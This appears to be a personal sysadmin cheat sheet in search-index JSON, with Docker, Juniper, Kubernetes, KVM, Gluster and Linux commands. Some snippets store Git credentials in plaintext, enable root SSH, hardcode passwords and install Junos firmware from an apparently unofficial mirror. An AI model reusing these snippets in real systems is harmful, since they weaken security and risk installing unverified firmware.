    docker volume create couchpotato-config\n\ndocker run \\\n    --name=couchpotato \\\n    -v couchpotato-config:/config \\\n    -v /storage/torrents_download:/downloads \\\n    -v /storage/media/movies:/movies \\\n    -e TZ=America/Toronto \\\n    -e PGID=113 -e PUID=109  \\\n    -p 5050:5050 \\\n    -d \\\n    linuxserver/couchpotato\n
    "},{"location":"docker/#watch-docker-stats","title":"Watch docker stats","text":"
    watch 'docker stats --no-stream --format \"table {{.Container}}\\t{{.Name}}\\t{{.CPUPerc}}\\t{{.MemUsage}}\"'\n
    "},{"location":"elasticsearch/","title":"Elasticsearch","text":""},{"location":"elasticsearch/#clean-indexes-old-than-x-days","title":"Clean indexes old than X days","text":"
    #! /bin/bash\n#Script to cleanup the logstash indices.\nDELETE_INDICES=$(/usr/bin/curl --silent -XGET 'localhost:9200/_cat/indices' | /bin/egrep -o logstash-20[0-9][0-9]\\.[0-9][0-9]\\.[0-9][0-9] | /bin/egrep -v \"$filter\" | /usr/bin/tr '\\n' ',')\nif [ $DELETE_INDICES ]\nthen\n/usr/bin/curl -XDELETE \"localhost:9200/$DELETE_INDICES\"\nfi\n
    "},{"location":"foreman/","title":"Foreman","text":""},{"location":"foreman/#remove-old-kernel-boot-files-sometimes-necessary-when-the-deployment-fails-with-a-kernel-not-foundmismatch-error","title":"Remove old kernel boot files (sometimes necessary when the deployment fails with a Kernel not found/mismatch error)","text":"
    ldumont@foreman:/srv/tftp/boot$ ls -alh\ntotal 189M\ndrwxr-xr-x 2 foreman-proxy root          4.0K Mar  9 12:53 .\ndrwxr-xr-x 8 root          nogroup       4.0K Dec 16  2018 ..\n-rw-r--r-- 1 foreman-proxy foreman-proxy  53M Sep  6  2019 centos-mirror-qVbSBrznIWMc-initrd.img\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.5M Aug  7  2019 centos-mirror-qVbSBrznIWMc-vmlinuz\n-rw-r--r-- 1 foreman-proxy foreman-proxy  30M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 5.1M Feb  1 09:55 debian-mirror-wXTzvPQ8AfC3-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  36M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 6.7M Apr 20  2016 ubuntu-16.04-16.04.5-x86_64-linux\n-rw-r--r-- 1 foreman-proxy foreman-proxy  45M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-initrd.gz\n-rw-r--r-- 1 foreman-proxy foreman-proxy 7.9M Apr 25  2018 ubuntu-mirror-WKCIULkETfqj-linux\n\n# Remove the all files related to a single OS.\nsudo rm -f debian-mirror*\n
    "},{"location":"foreman/#update-foreman","title":"Update Foreman","text":"
    #https://theforeman.org/manuals/1.22/index.html#3.6Upgrade\n\nsystemctl apache2 stop\n# Upgrade .list file from /etc/apt/sources.list.d/foreman.list\napt-get update\napt-get --only-upgrade install ruby\\* foreman\\*\nforeman-rake db:migrate\nforeman-rake db:seed\nforeman-rake tmp:cache:clear\nforeman-rake db:sessions:clear\n\n# Test Foreman upgrade\nforeman-installer --noop --dont-save-answers --verbose\n# Start Foreman installer upgrade.\nforeman-installer\nservice apache2 restart\n
    "},{"location":"foreman/#fix-failing-gem-packages","title":"Fix failing GEM packages.","text":"
    # As root\nsu foreman\n# cd to home\ncd\nmv Gemfile.lock Gemfile.lock.backup\n/usr/bin/foreman-ruby /usr/bin/bundle update\n/usr/bin/foreman-ruby /usr/bin/bundle install\n
    "},{"location":"foreman/#remove-plugin","title":"Remove plugin","text":"
    # Remove the gem file for your plugin.\n# rm ~foreman/bundler.d/Gemfile.local.rb\n# ~Gemfile.local.rb\n\n# Reinstall all gems without the old one\n/usr/bin/foreman-ruby /usr/bin/bundle install\n\n# Restart Foreman\ntouch ~foreman/tmp/restart.txt\n
    "},{"location":"frr/","title":"FRR","text":""},{"location":"frr/#enter-frr-shell","title":"Enter FRR shell","text":"
    sudo vtyshell\n
    "},{"location":"frr/#show-bgp-neigbors","title":"Show bgp neigbors","text":"
    show bgp neighbors\nshow bgp summary\n
    "},{"location":"frr/#show-information-from-neighbors","title":"Show information from neighbors","text":"
    show bgp vrf all ipv4 neighbors x.x.x.x advertised-routes\nshow bgp vrf all ipv4 neighbors x.x.x.x received-routes \n
    "},{"location":"frr/#frr-pfsense","title":"FRR pfsense","text":"
    show bgp ipv4 unicast neighbors 170.39.196.221 advertised-routes\nshow bgp summary\n
    "},{"location":"git/","title":"Git","text":""},{"location":"git/#git-stuff","title":"Git Stuff","text":""},{"location":"git/#easy-gitsh","title":"easy-git.sh","text":"
    #!/bin/bash\nDIRECTORY=.git\nif [ -z \"$1\" ]; then\n    echo \"You savage, you need a comment for a commit!\"\n    exit\nfi\n\nif [ -d \"$DIRECTORY\" ]; then\n    git add .\n    git commit -S -m \"$1\"\n    git push origin master\nelse\n    echo \"This is NOT a git repo\"\nfi\n
    "},{"location":"git/#credentials","title":"Credentials","text":"
    git config --global credential.helper store\ngit config --global credential.helper 'cache --timeout=3600' \n
    "},{"location":"gluster/","title":"Gluster","text":""},{"location":"gluster/#troubleshooting","title":"Troubleshooting","text":"
    gluster volume info\n
    sudo gluster peer probe kube2\n
    sudo gluster peer status\n
    gluster volume status all clients\n
    sudo gluster volume create gluster-vol-1 replica 2 transport tcp kube1:/gluster/gluster-vol-1 kube2:/gluster/gluster-vol-1\n
    "},{"location":"gluster/#no-replicate-single-server","title":"No replicate - single server.","text":"
    gluster volume create $VOLUME_NAME $IPADDRESS_OR_DOMAINNAME:/$ROOT_MOUNT_POINT/$SUBFOLDER\ngluster volume start $VOLUME_NAME\n
    "},{"location":"gluster/#mount-a-gluster-share","title":"Mount a gluster share.","text":"
    mount -t glusterfs $GLUSTER_SERVER_IP:$SHARE_NAME $LOCAL_PATH\n
    sudo gluster volume start gluster-vol-1\n
    "},{"location":"gluster/#enable-nfs-on-a-gluster-non-ganesha-volume","title":"Enable nfs on a gluster (non-ganesha) volume","text":"
    gluster volume set media nfs\ngluster volume set media nfs.disable off\ngluster volume set openstack-storage nfs.disable off\n
    "},{"location":"gluster/#disable-ctime-for-rancher-to-be-able-to-mount-gluster-volumes","title":"Disable ctime for Rancher to be able to mount Gluster volumes.","text":"
    root@gluster01:~# history | grep ctime\n  481  gluster volume set kube_vol ctime off\n  498  gluster volume set kube_vol ctime on\n  499  gluster volume set kube_vol ctime off\n  501  history | grep ctime\n
    "},{"location":"iperf/","title":"iPerf","text":"

    UDP TEST (DDOS like test where you send traffic to the other endpoint without any policing. iPerf3 does not allow you to send traffic directly for UDP. It needs to \"connect\" to an iPerf3 endpoint, even for UDP.

    ./iperf -c TARGET_IP --udp --interval 2 --bandwidth 9m\n

    IPERF SERVER TCP

    ./iperf --server\n

    IPERF CLIENT TCP UPLOAD AND THEN DOWNLOAD

    ./iperf --client IPERF_SERVER --tradeoff --window 1M\n

    IPERF CLIENT TCP UPLOAD AND DOWNLOAD AT THE SAME TIME

    ./iperf --client IPERF_SERVER --dualtest --window 1M\n
    "},{"location":"iperf/#iperf-systemd-file","title":"Iperf Systemd file","text":"
    [ec2-user@perf-server ~]$ sudo cat /etc/systemd/system/iperf3.service \n# /etc/systemd/system/iperf.service\n[Unit]\nDescription=iperf server\nAfter=syslog.target network.target auditd.service\n\n[Service]\nExecStart=/usr/bin/iperf3 --log /var/log/iperf/iperf-server.log --server\n\n[Install]\nWantedBy=multi-user.target\n
    "},{"location":"iscsi/","title":"ISCSI","text":""},{"location":"iscsi/#discover-login-targets","title":"Discover login targets","text":"
    iscsiadm --mode discoverydb -t sendtargets --portal $ISCSI_SERVER_IP --discover -d 7\n
    "},{"location":"iscsi/#show-iscsi-stats","title":"Show iscsi stats","text":"
    sudo iscsiadm --mode session --stats\n
    "},{"location":"juniper/","title":"Juniper","text":""},{"location":"juniper/#useful-commands","title":"Useful commands.","text":"
    # Show the current configuration.\nshow configuration\n\n#Show the logs of the device.\nshow log messsage\n\n#Show but compare\nshow | compare\n\n#Show but display as a line configuration and not XML.\nshow | display set\n\n#Show interface list and status\nshow interfaces terse\n\n#Show current hardware\nshow chassis hardware\n\n#Show global routing table\nshow route\n\nshow interface | incl (proto|Desc)\n\n#Show processus using memory and general system performance stats\nshow system processes summary\n\n#Check CPU usage\nshow chassis routing-engine\nshow system process extensive | no-more\n
    "},{"location":"juniper/#delete-interface-config","title":"Delete interface config","text":"
    delete interface ge-0/0/4\ndelete interface ge-0/0/5\ndelete interface ge-0/0/7\ndelete interface ae6\n
    "},{"location":"juniper/#syslog-configuration","title":"Syslog configuration.","text":"
    set system syslog user * any emergency\nset system syslog host 10.0.99.28 any any\nset system syslog host 10.0.99.28 port 1514\nset system syslog file messages any notice\nset system syslog file messages authorization info\nset system syslog file interactive-commands interactive-commands any\n
    "},{"location":"juniper/#radius-configuration","title":"Radius configuration.","text":"
    edit\nset system radius-server $RADIUS_SERVER_IP_HERE source-address $SWITCH_IP_HERE\nset system radius-server $RADIUS_SERVER_IP_HERE secret $PASSWORD_HERE\n\nset system authentication-order [ radius password ]\n\n#Create user profiles based on FreeIPA group.\n\nedit system login\nset user HELPDESK class read-only\nset user OPERATOR class super-user\nset user remote full-name \"default remote access user template\"\nset user remote class read-only\n
    "},{"location":"juniper/#create-a-vlan","title":"Create a vlan","text":"
    set vlans OSTACK-TEST-1 vlan-id 70\n
    "},{"location":"juniper/#create-a-l3-vlan-interface","title":"Create a L3 VLAN interface.","text":"
    set vlans MGMT vlan-id 69\nset interfaces ge-0/0/23 unit 0 family ethernet-switching port-mode trunk 666 vlan members 69\nset interfaces vlan unit 69 family inet address 10.10.69.14/24\nset vlans MGMT l3-interface vlan.69\n
    "},{"location":"juniper/#enable-ssh-with-root-login","title":"Enable SSH with root login.","text":"
    set system services ssh root-login allow\n
    "},{"location":"juniper/#create-a-default-route","title":"Create a default route.","text":"
    set routing-options static route 0.0.0.0/0 next-hop 10.10.69.1\n
    "},{"location":"juniper/#add-a-nameserver-for-dns-resolution","title":"Add a nameserver for DNS resolution.","text":"
    edit system name-server 8.8.8.8 \n
    "},{"location":"juniper/#upgrade-the-junos-image","title":"Upgrade the JunOS image.","text":"
    request system software add http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz\n\nfile copy http://web.weba.ru/pub/500G_3/Firmware/Juniper/12.3/domestic/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz  /var/tmp/\n\nrequest system software add /var/tmp/jinstall-ex-2200-12.3R5.7-domestic-signed.tgz reboot\n
    "},{"location":"juniper/#repair-a-junos-partition-that-rebooted-from-the-backup-partition","title":"Repair a JunOS partition that rebooted from the backup partition.","text":"
    ***********************************************************************\n**                                                                   **\n**  WARNING: THIS DEVICE HAS BOOTED FROM THE BACKUP JUNOS IMAGE      **\n**                                                                   **\n**  It is possible that the primary copy of JUNOS failed to boot up  **\n**  properly, and so this device has booted from the backup copy.    **\n**                                                                   **\n**  Please re-install JUNOS to recover the primary copy in case      **\n**  it has been corrupted and if auto-snapshot feature is not        **\n**  enabled.                                                         **\n**                                                                   **\n***********************************************************************\n
    show chassis alarms\nshow system storage partitions\nrequest system snapshot media internal slice alternate\nshow system snapshot media internal\nrequest system reboot slice alternate media internal\n
    "},{"location":"juniper/#create-an-admin-user","title":"Create an admin user.","text":"
    set system login user cmaker authentication plain-text-password\nset system login user cmaker class super-user\n
    "},{"location":"juniper/#add-a-ssh-key-to-a-local-user-for-password-less-auth","title":"Add a SSH key to a local user for password-less auth.","text":"
    set system login user prox-exporter-juniper authentication ssh-rsa \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJZTRPs8WXsD1yNmWd69/zHNDf4ApvTXDjfk0rxEjgiDsOgWvID0Q8ZH0tFzSV9L0W7a/9jG0POuJyiGYF6M4X2QdEPSZ2CgxRm7GL4A1SJ4xbnCYny2k4L8C7UrDrvqThv6/FyyJopHCPp7S3j0iAI6c+Gtv59sbUvdilWC4Y5LX0ho+yocMaGvTOk+l5aQRU9eWmZsD0/3D0V99iBnm70rlEeEIr1Oe+M+y/Q/0vmBVdC75COCxu84PnLvqPH2yOf3j581wgIVncKbApB0b9ApTbCE94jNljtwM4uGM9qICOf0BwbrDfFT1L1n5ZQx7BZnD9410wv2jTYXTPUJV1\"\nset system login user prox-exporter-juniper class super-user\n
    "},{"location":"juniper/#password-recovery","title":"Password recovery.","text":"
    Boot normally.\n\nPrompt : Hit [Enter] to boot immediately, or space bar for command prompt.\n\npress space during the boot process\n\nType :\nloader> boot -s\n\nType : \nEnter full pathname of shell or 'recovery' for root password recovery or RETURN for /bin/sh: recovery\n
    "},{"location":"juniper/#configure-snmp-with-contact-and-location-strings","title":"Configure SNMP with contact and location strings.","text":"
    set snmp name \u201ccmaker-ex2200\u201d description \u201ccmaker-ex2200\u201d\nset snmp location \u201c9880 Clark\u201d\nset snmp contact \"laurentfdumont@gmail.com\"\nset snmp community cmaker authorization read-only\n
    "},{"location":"juniper/#aggregated-interfaces-ae","title":"Aggregated interfaces (AE)","text":"
    #Increase the number of AE interfaces.\nset chassis aggregated-devicesethernetdevice-count4 \n\n\n#Create the AE interface and the switching options.\nset interfaces ae3 description AE-LACP-ULTRABACON-PROXMOX\nset interfaces ae3 aggregated-ether-options lacp active\nset interfaces ae3 unit 0 family ethernet-switching port-mode trunk\nset interfaces ae3 unit 0 family ethernet-switching vlan members 69\nset interfaces ae3 unit 0 family ethernet-switching vlan members 99-100\nset interfaces ae3 unit 0 family ethernet-switching vlan members 210\nset interfaces ae3 unit 0 family ethernet-switching vlan members 2001\nset interfaces ae3 unit 0 family ethernet-switching native-vlan-id 666\n\ncmaker@ex2200-cmaker> show configuration interfaces ge-0/0/17 | display set \nset interfaces ge-0/0/17 description LACP-ULTRABACON-PROXMOX\nset interfaces ge-0/0/17 ether-options 802.3ad ae3\n
    "},{"location":"kolla/","title":"Kolla","text":""},{"location":"kolla/#deploying-kolla","title":"Deploying Kolla","text":"
    kolla-ansible -i ./multinode bootstrap-servers\nkolla-ansible -i ./multinode prechecks\nkolla-ansible -i ./multinode deploy\n
    "},{"location":"kubernetes/","title":"Kubernetes","text":""},{"location":"kubernetes/#pod-configuration","title":"Pod configuration","text":""},{"location":"kubernetes/#get-pods-running-on-specific-node","title":"Get pods running on specific node","text":"
    #Get the node names\nkubectl get nodes                                                                                                                                                                                                                                                                         Tue 14 Apr 2020\nNAME          STATUS   ROLES                      AGE    VERSION\n10.10.99.58   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.59   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.60   Ready    controlplane,etcd,worker   138d   v1.16.3\n10.10.99.61   Ready    controlplane,etcd,worker   138d   v1.16.3\n\n#Get all the pods on that node\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58\n\nkubectl get pods --all-namespaces -o wide --field-selector spec.nodeName=10.10.99.58                                                                                                                                                                                              353ms \ue0b3 Tue 14 Apr 2020\nNAMESPACE              NAME                                                       READY   STATUS      RESTARTS   AGE    IP            NODE          NOMINATED NODE   READINESS GATES\ncattle-prometheus      exporter-node-cluster-monitoring-8zzvj                     1/1     Running     2          36d    10.10.99.58   10.10.99.58   <none>           <none>\ncattle-prometheus      prometheus-operator-monitoring-operator-7985c7f758-9rgf6   1/1     Running     3          36d    10.42.2.112   10.10.99.58   <none>           <none>\ncattle-system          cattle-node-agent-6fprv                                    1/1     Running     5          137d   10.10.99.58   10.10.99.58   <none>           <none>\ncattle-system          rancher-c88c6458c-ggnww                                    1/1     Running     22         138d   10.42.2.103   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-584cbff946-mcds8                              1/1     Running     13         138d   10.42.2.107   10.10.99.58   <none>           <none>\ncert-manager           cert-manager-cainjector-7c556d76f-s48js                    1/1     Running     37         115d   10.42.2.111   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-migrations.1-gwfl9                                  0/1     Completed   0          36d    10.42.2.82    10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-minio-67df89d968-lpg9b                              1/1     Running     2          36d    10.42.2.116   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-controller-5655b8bf66-mtvdl           1/1     Running     2          36d    10.42.2.109   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-nginx-ingress-default-backend-677f7b7778-7dj7q      1/1     Running     2          36d    10.42.2.110   10.10.99.58   <none>           <none>\ncmaker-lab-namespace   gitlab-registry-647ddd89c-qrdhj                            1/1     Running     2          36d    10.42.2.115   10.10.99.58   <none>           <none>\nfoldingathome          fah-workers-3                                              1/1     Running     0          9d     10.42.2.125   10.10.99.58   <none>           <none>\ningress-nginx          default-http-backend-67cf578fc4-6ffns                      1/1     Running     4          138d   10.42.2.104   10.10.99.58   <none>           <none>\ningress-nginx          nginx-ingress-controller-tdfv8                             1/1     Running     4          138d   10.10.99.58   10.10.99.58   <none>           <none>\nistio-system           istio-pilot-56866b7c5f-5pfj4                               2/2     Running     6          73d    10.42.2.106   10.10.99.58   <none>           <none>\nistio-system           istio-sidecar-injector-8565bfc879-85p4n                    1/1     Running     4          73d    10.42.2.102   10.10.99.58   <none>           <none>\nistio-system           istio-tracing-79fbf487df-g6xml                             2/2     Running     7          73d    10.42.2.108   10.10.99.58   <none>           <none>\nkube-system            canal-85lqk                                                2/2     Running     8          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            coredns-5c59fd465f-k6ks7                                   1/1     Running     4          138d   10.42.2.105   10.10.99.58   <none>           <none>\nkube-system            rke-coredns-addon-deploy-job-p97pl                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-ingress-controller-deploy-job-r2bcz                    0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-metrics-addon-deploy-job-r2dmg                         0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nkube-system            rke-network-plugin-deploy-job-ghlhz                        0/1     Completed   0          138d   10.10.99.58   10.10.99.58   <none>           <none>\nmetallb-system         controller-65895b47d4-stk74                                1/1     Running     2          35d    10.42.2.113   10.10.99.58   <none>           <none>\nmetallb-system         speaker-pnc7d                                              1/1     Running     2          35d    10.10.99.58   10.10.99.58   <none>           <none>\n
    "},{"location":"kubernetes/#config-map","title":"Config-map","text":"
    kubectl create configmap ara-config --namespace cmaker-lab-namespace --from-file=config-maps/settings.yaml   \nkubectl get configmap --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#create-helm-charts","title":"Create helm charts","text":"
    helm install ara-postgres --namespace cmaker-lab-namespace  ./postgresql/ --values postgresql/values.yaml\nhelm install ara-ansible --namespace cmaker-lab-namespace  ./helm-ansible-ara/ --values helm-ansible-ara/values.yaml\n
    "},{"location":"kubernetes/#delete-helm-charts","title":"Delete helm charts","text":"
    helm delete ara-ansible --namespace cmaker-lab-namespace\nhelm delete ara-postgres --namespace cmaker-lab-namespace\n
    "},{"location":"kubernetes/#debugging","title":"Debugging","text":""},{"location":"kubernetes/#delete-pv","title":"Delete PV","text":"
    ldumont@docker01:~$ kubectl delete pv test --grace-period=0 --force^C\nldumont@docker01:~$ kubectl patch pv test -p '{\"metadata\": {\"finalizers\": null}}'\n
    "},{"location":"kubernetes/#storage","title":"Storage","text":""},{"location":"kubernetes/#create-gluster-endpoint","title":"Create Gluster Endpoint.","text":"

    gluster-endpoints.yaml

    ---\nkind: Endpoints\napiVersion: v1\nmetadata:\n name: glusterfs-cluster\nsubsets:\n- addresses:\n - ip: 9.111.249.161\n ports:\n - port: 666\n

    gluster-service.yaml

    apiVersion: v1\nkind: Service\nmetadata:\n  name: glusterfs-cluster\nspec:\n  ports:\n  - port: 666\n
    "},{"location":"kvm/","title":"KVM","text":""},{"location":"kvm/#customize-qcow2-images","title":"Customize qcow2 images","text":"

    Download the .img first

    virt-customize --install ethtool,traceroute,iputils-ping,socat,dnsutils,tcpdump,tshark,iperf,iperf3,mtr,fping,lldpd --root-password password:potato123 -a 22.04-server.img\n

    Sysprep is necessary to remove any static information from a VM (hostname, ssh host keys, interfaces MAC/config). Similar to Windows sysprep.

    In this case, we do not remove the ssh-hostkeys because of possible issues with ssh access if the keys are not re-generated.

    virt-sysprep --operations defaults,-ssh-hostkeys -a 22.04-server.img\n
    "},{"location":"kvm/#using-uvtools-for-ubuntu-minimal-images","title":"Using uvtools for Ubuntu minimal images","text":"

    Download the images

    uvt-kvm  uvt-simplestreams-libvirt sync --source https://cloud-images.ubuntu.com/minimal/daily/ release=bionic arch=amd64\n
    uvt-kvm create --packages iperf,iperf3,dnsutils,tcpdump,--disk 5 --password potato123 --memory 2048 --cpu 2 myminimalvm-jammy release=jammy arch=amd64 \"label=minimal daily\"\n

    Download images are in /var/lib/uvtool/libvirt/images/

    "},{"location":"kvm/#get-list-of-os-variants-valid-for-kvm","title":"Get list of os-variants valid for KVM","text":"
    ldumont@kvm01:~$ osinfo-query os | grep -i centos\ncentos6.0            | CentOS 6.0                                         | 6.0      | http://centos.org/centos/6.0            \ncentos6.1            | CentOS 6.1                                         | 6.1      | http://centos.org/centos/6.1            \ncentos6.10           | CentOS 6.10                                        | 6.10     | http://centos.org/centos/6.10           \ncentos6.2            | CentOS 6.2                                         | 6.2      | http://centos.org/centos/6.2            \ncentos6.3            | CentOS 6.3                                         | 6.3      | http://centos.org/centos/6.3            \ncentos6.4            | CentOS 6.4                                         | 6.4      | http://centos.org/centos/6.4            \ncentos6.5            | CentOS 6.5                                         | 6.5      | http://centos.org/centos/6.5            \ncentos6.6            | CentOS 6.6                                         | 6.6      | http://centos.org/centos/6.6            \ncentos6.7            | CentOS 6.7                                         | 6.7      | http://centos.org/centos/6.7            \ncentos6.8            | CentOS 6.8                                         | 6.8      | http://centos.org/centos/6.8            \ncentos6.9            | CentOS 6.9                                         | 6.9      | http://centos.org/centos/6.9            \ncentos7.0            | CentOS 7.0                                         | 7.0      | http://centos.org/centos/7.0          \n
    "},{"location":"kvm/#create-pxe-only-virsh-domain","title":"Create PXE only virsh domain","text":"
    sudo virt-install --name test-ubuntu \\\n--ram 4096 --vcpus 2 \\\n--disk path=/var/lib/libvirt/images/test-ubuntu,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/mini.iso \\\n--network bridge:br0 \\\n--network bridge:br1 \\\n--os-variant ubuntu18.04\n\nsudo virt-install --name ooo-director \\\n--ram 18432 --vcpus 8 \\\n--disk path=/var/lib/libvirt/images/ooo-director,bus=virtio,size=50 \\\n--noautoconsole --graphics vnc \\\n--cdrom=/var/lib/libvirt/boot/CentOS-7-x86_64-Minimal-1908.iso \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller001.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller002 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller002.qcow2,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-controller003 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-controller003.qcow2,bus=virtio,size=50 \\  \n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n\nsudo virt-install --name ooo-compute001 \\\n--ram 9216 --vcpus 4 \\\n--disk path=/var/lib/libvirt/images/ooo-compute001,bus=virtio,size=50 \\\n--pxe --noautoconsole --graphics vnc \\\n--network bridge:br1 \\\n--network bridge:br0 \\\n--os-variant centos7.0\n
    "},{"location":"kvm/#bridge-physical-interface-for-vm-access","title":"Bridge physical interface for VM access.","text":"
    #Install the bridge-utils package\napt-get install bridge-utils\n\n#Create the two bridges\nbrctl addbr br1\nbrctl addbr br2\n
    # In /etc/network/interfaces\n# Use old eth0 config for br0, plus bridge stuff\n\n#loopback\nauto lo\niface lo inet loopback\n\nauto br0\nauto br1\n\niface br0 inet static\n    address 10.10.99.62\n    gateway 10.10.99.1\n    netmask 255.255.255.0\n    dns-nameservers 10.10.99.1 \n    dns-search cmaker.studio\n    bridge_ports    ens18\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n\niface br1 inet manual\n    bridge_ports    ens19\n    bridge_stp      off\n    bridge_maxwait  0\n    bridge_fd       0\n
    "},{"location":"kvm/#show-vnc-information-port-is-590vncdisplay_index","title":"Show VNC information - port is 590$(VNCDISPLAY_INDEX)","text":"
    root@kvm01:~# virsh vncdisplay ooo-controller001\n:0\n\nroot@kvm01:~# virsh vncdisplay ooo-controller002\n:1\n\nroot@kvm01:~# virsh vncdisplay ooo-controller003\n:2\n\nroot@kvm01:~# netstat -punta | grep 590\ntcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN      2691/qemu-system-x8 \ntcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      2559/qemu-system-x8 \ntcp        0      0 0.0.0.0:5901            0.0.0.0:*               LISTEN      2649/qemu-system-x8 \n
    "},{"location":"kvm/#vbmc","title":"VBMC","text":""},{"location":"kvm/#installation","title":"Installation","text":"
    yum install gcc python-devel\npip install --upgrade setuptools\npip install virtualbmc\n
    vbmc add ooo-controller001 --port 16001 --username test --password secret\nvbmc add ooo-controller002 --port 16002 --username test --password secret\nvbmc add ooo-controller003 --port 16003 --username test --password secret\nvbmc add ooo-compute001 --port 16004 --username test --password secret\n\nvbmc start ooo-controller001\nvbmc start ooo-controller002\nvbmc start ooo-controller003\nvbmc start ooo-compute001\n
    "},{"location":"kvm/#enable-serial-connection-over-virsh","title":"Enable serial connection over virsh","text":"
    #FROM THE GUEST VM\nsudo systemctl enable serial-getty@ttyS0.service\nsudo systemctl start serial-getty@ttyS0.service\n
    #FROM THE KVM HOST\nsudo virsh console $DOMAIN_NAME\n#OR GET THE DOMAIN ID from `virsh list`\nsudo virsh console $KVM_DOMAIN_ID\n
    "},{"location":"linux/","title":"Generic Linux","text":"

    Rancid - Check which devices are impacted

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq\n

    Rancid - Only show the device name to pipe into ssh-keygen

    sort var/logs/VPN.20180109.070410  | grep -i key | uniq | grep -Eo '^[^ ]+'\n
    sort /opt/rancid/var/logs/VPN.20180111.064300  | grep -i key | uniq | grep -Eo '^[^ ]+'\n

    SSH - Remove the public keys

    ssh-keygen -f \"/opt/rancid/.ssh/known_hosts\" -R ###REMOTE_IP_OF_DEVICE###\n

    BIND DNS - Check the master zones (not ARPA or random files ) we are hosting

    ls -alh --ignore=*.arpa* | wc -\n

    SMART HD Data - Get useful smartctl data

    sudo smartctl -a /dev/sdb | egrep \"Spin_Up_Time|Reallocated_Sector_Ct|Temperature|Current_Pending_Sector|Offline_Uncorrectable|Power_On_Hours\"\n

    Network - Create TAP Interface

    tunctl -t tap0\nifconfig tap0 10.1.1.100 netmask 255.255.255.0 up\n

    Start Linux stress test

    screen -S stress-test -d -m stress --cpu 100 --io 100 --vm 20 --vm-bytes 1G --hdd 5 --timeout 24h\n

    Install markdown-pdf

    sudo npm install -g phantomjs --unsafe-perm\nsudo npm install -g markdown-pdf --unsafe-perm\n

    Debug Radius, FreeIPA, LDAP

    radiusd -X 2>&1 | tee debugfile\n\ntail -f /var/log/dirsrv/slapd-EVENT-DHMTL-CA/access\n\nradtest ldumont user_ldap_password 10.0.99.22 1812 shared_radius_secret\n\nldapwhoami -vvv -h 10.0.99.22 -p 389 -D uid=ldumont,cn=users,cn=accounts,dc=event,dc=dhmtl,dc=ca -x -w user_ldap_password\n
    "},{"location":"linux/#when-windows-10-creator-upgrade-breaks-linux-grub","title":"When Windows 10 Creator upgrade breaks Linux Grub","text":"
    set root=(hd0,msdos5)\nset prefix=(hd0,msdos5)/boot/grub\ninsmod normal\nnormal\n

    When in the OS - to make the changes permanent.

    sudo update-grub\nsudo grub-install disk\n
    "},{"location":"linux/#upgrading-to-debian-testing-breaks-apt-when-trying-to-downgrade","title":"Upgrading to Debian testing breaks APT when trying to downgrade.","text":"

    Replace \"Ubuntu\" with \"Debian\" if you are running Debian /etc/apt/preferences.d/allow-downgrade

    Package: *\nPin: release a=stable\nPin-Priority: 1001\n
    apt-get update\napt-get upgrade\n

    Remove the file after and

    apt-get update\n

    If you are missing gnome and the display doesn't work

    sudo apt-get update\nsudo apt-get upgrade\nsudo apt-get dist-upgrade\nsudo apt-get install nvidia-driver\nsudo shutdown -r now\n

    Should be good to go!

    "},{"location":"linux/#unbalanced-audio-with-pulse-audio","title":"Unbalanced audio with Pulse audio","text":"
    killall pulseaudio; rm -r ~/.config/pulse/* ; rm -r ~/.pulse*\npulseaudio -k \n

    Reboot!

    "},{"location":"linux/#create-gpg-key-and-export-the-key-format-for-signing-github-commits","title":"Create GPG key and export the key format for signing Github commits","text":"
    #Create the key\ngpg --gen-key\n\n#Show the key ID\ngpg --list-keys\n\n#Set the global Git sign key\ngit config --global user.signingkey $KEY_ID_HERE\n\n#Set the GPG sign flag to true for all repos.\ngit config --global commit.gpgsign true\n\n#Export the key with \"-----BEGIN PGP PUBLIC KEY BLOCK-----\"\ngpg --armor --export laurentfdumont@gmail.com > mykey.asc\n
